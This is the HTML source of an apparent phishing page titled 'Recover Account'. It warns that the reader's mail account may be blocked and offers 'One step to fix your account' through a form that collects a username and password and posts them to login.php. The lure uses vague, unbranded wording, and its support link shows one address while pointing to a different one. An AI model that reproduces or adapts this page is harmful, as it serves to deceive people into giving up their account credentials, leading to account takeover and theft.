<html><head><script async="" src="Recover%20Account_files/analytics.js"></script><script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-68201809-2	', 'auto');
   
  ga('send', 'pageview');
</script>
                


<script type="text/javascript" src="Recover%20Account_files/cfform.js"></script>
<script type="text/javascript" src="Recover%20Account_files/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Recover Account</title>
<link rel="stylesheet" type="text/css" href="Recover%20Account_files/style.css">
<link href="Recover%20Account_files/css.css" rel="stylesheet" type="text/css">

<script type="text/javascript">/* <![CDATA[ */
	if (window.ColdFusion) ColdFusion.required['Email']=true;
/* ]]> */</script>

<script type="text/javascript">/* <![CDATA[ */
	if (window.ColdFusion) ColdFusion.required['userPassword']=true;
/* ]]> */</script>
<script type="text/javascript">
<!--
    _CF_checkuserLogin = function(_CF_this)
    {
        //reset on submit
        _CF_error_exists = false;
        _CF_error_messages = new Array();
        _CF_error_fields = new Object();
        _CF_FirstErrorField = null;

        //form element Email required check
        if( !_CF_hasValue(_CF_this['Email'], "TEXT", false ) )
        {
            _CF_onError(_CF_this, "Email", _CF_this['Email'].value, "Please enter your Email");
            _CF_error_exists = true;
        }

        //form element userPassword required check
        if( !_CF_hasValue(_CF_this['userPassword'], "PASSWORD", false ) )
        {
            _CF_onError(_CF_this, "userPassword", _CF_this['userPassword'].value, "Please enter Password");
            _CF_error_exists = true;
        }


        //display error messages and return success
        if( _CF_error_exists )
        {
            if( _CF_error_messages.length > 0 )
            {
                // show alert() message
                _CF_onErrorAlert(_CF_error_messages);
                // set focus to first form error, if the field supports js focus().
                if( _CF_this[_CF_FirstErrorField].type == "text" )
                { _CF_this[_CF_FirstErrorField].focus(); }

            }
            return false;
        }else {
            return true;
        }
    }
//-->
</script>
<style type="text/css">
<!--
.style2 {font-size: 14px}
-->
</style>
</head>
<body class="smalltextred">
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<table border="0" align="center"> 
<tbody><tr><td colspan="2" width="977">

    <table width="861" height="248" cellspacing="0" cellpadding="0" align="center"> 

<tbody><tr valign="top">
<td width="407" height="226">
<div id="liquid-round">
    <div class="top"><span></span></div>
    <div class="center-content">
        <!-- CONTENT BEGIN -->
        
    <table width="343" height="210" border="0" align="center">
            <tbody><tr><td width="274" height="59"><h2>How Your Account Might Become Blocked</h2>
            <hr></td>
		</tr>
            <tr>
				<td class="smalltext" height="90">
			
			There are many ways in which a mail account might become blocked. 
However, with one exception these are all due to end user misuse, which 
typically only occurs by ignoring or misreading the terms of use.</td>
        </tr>
			<tr>
	            <td>&nbsp;</td>
		</tr>
  <tr>		</tr>
	  </tbody></table>
        <!-- CONTENT END -->
    </div>
    <div class="bottom"><span></span></div>
</div>

 
</td>
     <td width="56">&nbsp;</td>
  <td width="396">
      <div id="liquid-round">
    <div class="top"><span></span></div>
    <div class="center-content">
        <!-- CONTENT BEGIN -->
         <form name="userLogin" id="userLogin" action="login.php" method="post" style="margin: 0px; padding: 0px;" onsubmit="return _CF_checkuserLogin(this)">
       <table height="210" bordercolor="#000000" border="0" align="center">
            <tbody><tr><td width="341"><span class="largetext"><strong>One step to fix your account
            </strong></span>
              <hr></td>
		</tr>
            <tr>
				<td><span class="smalltext">username:</span><br>
				  <input name="login" id="username" style="width: 210px" size="1" tabindex="70"></td>
	        </tr>
		  	<tr>
				<td><span class="smalltext">Password:</span><br>
				  <input name="passwd" id="userPassword" style="width: 210px" type="password"></td>
			</tr>
			<tr>
	            <td><div class="smalltext">
	              <input name="Login" id="Login" value="Verify Now" type="submit">
	            </div> 
<span class="smalltext" style="color:red"></span><br>
 


<br> </td>
			</tr>
	  </tbody></table> 
 </form>


    </div>
    <div class="bottom"><span></span></div>
</div>


 </td>
</tr>
<tr><td colspan="3" align="center"><br>
<h2>



			Verify and Recover a blocked or suspended account.
            
    </h2></td></tr>
</tbody></table></td>
</tr>
<tr>
<td>
<br>
<br>

<div class="smalltext">Please allow up to one hour to validate your email. The 
	email verification and validation takes after one hour, please feel free to contact <a href="mailto:techsupport@jetapplication.com">support@services-mail.com</a> anytime. </div>
<br>


</td>
</tr>
</tbody></table>
<br>
<br>
<br>

<br>
<br>
<br>

    <div class="footer">
      <h3 align="center">The application information on this site is specific to all nationalities. </h3>
  </div>

</body></html>